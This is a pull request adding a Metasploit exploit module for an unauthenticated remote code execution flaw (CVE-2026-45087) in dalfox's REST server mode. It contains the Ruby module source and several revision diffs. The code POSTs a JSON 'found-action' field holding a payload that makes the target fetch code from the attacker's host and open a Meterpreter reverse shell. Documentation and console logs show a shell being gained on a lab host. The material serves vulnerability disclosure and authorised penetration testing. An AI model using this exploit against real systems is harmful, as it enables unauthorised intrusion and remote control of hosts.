### PR TITLE
Add Dalfox Unauthenticated RCE module (CVE-2026-45087)

### DIFF
--- a/documentation/modules/exploit/linux/http/dalfox_server_rce_cve_2026_45087.md
+++ b/documentation/modules/exploit/linux/http/dalfox_server_rce_cve_2026_45087.md
@@ -1,0 +1,120 @@
+## Vulnerable Application
+
+When dalfox is started in REST API server mode (dalfox server),
+the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key.
+Because model.Options — including FoundAction and FoundActionShell — is deserialized directly from attacker-supplied JSON in POST /scan,
+and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them,
+any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute
+on the host whenever a scan finding is triggered.
+
+The vulnerability affects:
+
+    * dalfox <= 2.12.0
+
+This module was successfully tested on:
+
+    * dalfox 2.12.0 on Ubuntu 24.04
+
+
+### Installation
+1. `go install github.com/hahwul/dalfox/v2@v2.12.0`
+
+2. `export PATH=$PATH:$(go env GOPATH)/bin`
+
+3. `dalfox server`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/dalfox_server_rce_cve_2026_45087`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+
+```
+msf > use exploit/linux/http/dalfox_server_rce_cve_2026_45087
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(linux/http/dalfox_server_rce_cve_2026_45087) > options
+
+Module options (exploit/linux/http/dalfox_server_rce_cve_2026_45087):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5h, sapni, socks4, socks5, http
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    6664             yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVSSL   false            no        Negotiate SSL/TLS for local server connections
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Ac
+                                              cepted: none, python3.8+, shell-search, shell)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST           192.168.0.12     yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,GET,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      LGzgRxSNvoC      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(linux/http/dalfox_server_rce_cve_2026_45087) > run lhost=192.168.56.1 rhost=192.168.56.16
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Dalfox detected.
+[*] Using URL: http://192.168.56.1:8081/mcpYksL
+[*] Server started.
+[*] Sending stage (3090404 bytes) to 192.168.56.16
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:40642) at 2026-05-24 09:30:54 +0900
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer     : vul
+OS           : Ubuntu 24.04 (Linux 6.8.0-56-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

--- a/modules/exploits/linux/http/dalfox_server_rce_cve_2026_45087.rb
+++ b/modules/exploits/linux/http/dalfox_server_rce_cve_2026_45087.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Dalfox RCE',
+        'Name' => 'Dalfox Found-Action Deserialization RCE',
         'Description' => %q{
           When dalfox version <= 2.12.0 is started in REST API server mode (dalfox server),
           the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key.

--- a/modules/exploits/linux/http/dalfox_server_rce_cve_2026_45087.rb
+++ b/modules/exploits/linux/http/dalfox_server_rce_cve_2026_45087.rb
@@ -39,7 +39,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
         'DefaultOptions' => {
-          'FETCH_DELETE' => true
+          'FETCH_DELETE' => true,
+          'SRVPORT' => '8081'
         },
         'DefaultTarget' => 0,
         'Payload' => {
@@ -61,7 +62,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_advanced_options([
-      OptPort.new('SRVPORT', [true, 'The local port to listen HTTP requests from target', 8081 ]),
       OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
     ])
   end

--- a/modules/exploits/linux/http/dalfox_server_rce_cve_2026_45087.rb
+++ b/modules/exploits/linux/http/dalfox_server_rce_cve_2026_45087.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Dalfox RCE',
+        'Description' => %q{
+          When dalfox is started in REST API server mode (dalfox server),
+          the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key.
+          Because model.Options — including FoundAction and FoundActionShell — is deserialized directly from attacker-supplied JSON in POST /scan,
+          and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them,
+          any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.
+        },
+        'Author' => [
+          'Emmanuel David',   # Vulnerability discovery and PoC
+          'Takahiro Yokoyama' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-45087'],
+          ['GHSA', 'v25v-m36w-jp4h'],
+        ],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'FETCH_DELETE' => true
+        },
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'DisclosureDate' => '2026-05-07',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(6664),
+      ]
+    )
+
+    register_advanced_options([
+      OptPort.new('SRVPORT', [true, 'The local port to listen HTTP requests from target', 8081 ]),
+      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'swagger/index.html')
+    })
+    return Exploit::CheckCode::Unknown('Could not detect the dalfox.') unless res&.code == 200
+
+    Exploit::CheckCode::Appears('Dalfox detected.')
+  end
+
+  def on_request_uri(cli, request)
+    send_response(cli, "<html><body>#{request.resource}</body></html>")
+  end
+
+  def primer
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'scan'),
+      'headers' => { 'Content-Type' => 'application/json' },
+      'data' => {
+        'url' => get_uri,
+        'options' => {
+          'found-action' => payload.encode,
+          'found-action-shell' => 'bash',
+          'use-headless' => false,
+          'worker' => 1,
+          'limit-result' => 1
+        }
+      }.to_json
+    })
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res&.code == 200
+  end
+
+  def exploit
+    Timeout.timeout(datastore['HTTPDELAY']) { super }
+  rescue Timeout::Error
+    # When the server stops due to our timeout, this is raised
+  end
+
+end

--- a/modules/exploits/linux/http/dalfox_server_rce_cve_2026_45087.rb
+++ b/modules/exploits/linux/http/dalfox_server_rce_cve_2026_45087.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           When dalfox is started in REST API server mode (dalfox server),
           the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key.
-          Because model.Options — including FoundAction and FoundActionShell — is deserialized directly from attacker-supplied JSON in POST /scan,
+          Because model.Options - including FoundAction and FoundActionShell - is deserialized directly from attacker-supplied JSON in POST /scan,
           and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them,
           any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.
         },

--- a/modules/exploits/linux/http/dalfox_server_rce_cve_2026_45087.rb
+++ b/modules/exploits/linux/http/dalfox_server_rce_cve_2026_45087.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Dalfox RCE',
         'Description' => %q{
-          When dalfox is started in REST API server mode (dalfox server),
+          When dalfox version <= 2.12.0 is started in REST API server mode (dalfox server),
           the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key.
           Because model.Options - including FoundAction and FoundActionShell - is deserialized directly from attacker-supplied JSON in POST /scan,
           and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them,
@@ -40,7 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultOptions' => {
           'FETCH_DELETE' => true,
-          'SRVPORT' => '8081'
+          'SRVPORT' => 8081,
+          'RPORT' => 6664
         },
         'DefaultTarget' => 0,
         'Payload' => {
@@ -54,11 +55,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'Reliability' => [ REPEATABLE_SESSION, ]
         }
       )
-    )
-    register_options(
-      [
-        Opt::RPORT(6664),
-      ]
     )
 
     register_advanced_options([


### PR DESCRIPTION
[CVE-2026-45087](https://github.com/advisories/GHSA-v25v-m36w-jp4h)

## Vulnerable Application

When dalfox is started in REST API server mode (dalfox server), the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options — including FoundAction and FoundActionShell — is deserialized directly from attacker-supplied JSON in POST /scan, and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered.

The vulnerability affects:

    * dalfox <= 2.12.0

This module was successfully tested on:

    * dalfox 2.12.0 on Ubuntu 24.04


### Installation
1. `go install github.com/hahwul/dalfox/v2@v2.12.0`

2. `export PATH=$PATH:$(go env GOPATH)/bin`

3. `dalfox server`


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/dalfox_server_rce_cve_2026_45087`
4. Do: `run lhost=<lhost> rhost=<rhost>`
5. You should get a meterpreter


## Scenarios

```
msf > use exploit/linux/http/dalfox_server_rce_cve_2026_45087
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/dalfox_server_rce_cve_2026_45087) > run lhost=192.168.56.1 rhost=192.168.56.16
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Dalfox detected.
[*] Using URL: http://192.168.56.1:8081/mcpYksL
[*] Server started.
[*] Sending stage (3090404 bytes) to 192.168.56.16
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:40642) at 2026-05-24 09:30:54 +0900
[*] Server stopped.

meterpreter > getuid
Server username: ubu
meterpreter > sysinfo
Computer     : vul
OS           : Ubuntu 24.04 (Linux 6.8.0-56-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
